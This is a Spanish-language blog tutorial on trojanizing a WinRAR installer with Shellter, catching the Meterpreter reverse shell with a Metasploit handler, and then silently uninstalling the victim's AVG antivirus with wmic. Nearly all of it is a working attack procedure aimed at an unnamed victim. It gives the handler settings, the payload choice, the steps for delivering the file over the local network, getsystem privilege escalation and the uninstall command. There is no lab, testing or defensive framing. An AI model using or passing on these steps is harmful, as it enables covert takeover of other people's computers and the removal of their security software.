HACER BYPASS Y DESINSTALAR ANTIVIRUS DESDE KALI LINUX

Hace unas horas he publicado un video sobre usar un bypass pero este método lo he combinado y me ha gustado porque elimina totalmente el antivirus sin que el usuario sé cuenta.

Vamos a usar el software de “WRAR.EXE” en el cual lo inyectamos con shellter para poner ejecutarlo también por msfconsole.

 cd Downloads/shellter

Lo ejecutamos

 wine shellter

Los siguientes paso sigan leyendo en el post que le deje arriba.
Ahora usaremos msfconsole.

service postgresql start
 msfconsole

Ahora comandamos a un exploit.

use exploit/multi/handler

Para ver los detalles

show options

Ahora nos pide la IP Y PUERTO

 set LHOST IP
set LPORT 8080

Ahora vamos a usar el meterpreter para windows. En el cual usaremos el mismo que usamos con shellter.

 set PAYLOAD windows/meterpreter/reverse_tcp

Ahora para ejecutarlo

exploit -j

En el cual enviamos a la victima el software o archivo “wrar.exe” en mi caso lo hare por la misma red usando SimpleHTTPServer.
Cuando la victima intente instalar el programa de winrar, aparte de instalar winrar va a instalar el exploit programado.Active sessions

sessions -i 1

Para saber datos del sistema.

 sysinfo

Vemos datos de los programas.

 ps
getsystem
getuid

Estos comandos fueron para obtener información más complejo del sistema antes de ejecutar nuestra shell.

shell

Ahora aquí viene lo bueno
VAMOS A DESINSTALAR EL ANTIVIRUS O ALGÚN PROGRAMA QUE QUERAMOS.

wmic product get name

Vemos solo los nombres de los software instalado en el sistema.

wmic product where name="AVG" call uninstall /nointeractive

Lo que hacemos es dejar que el programa no se ejecute y poder desinstalarlo.
Espero que te guste y compártelo con tus amigos.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s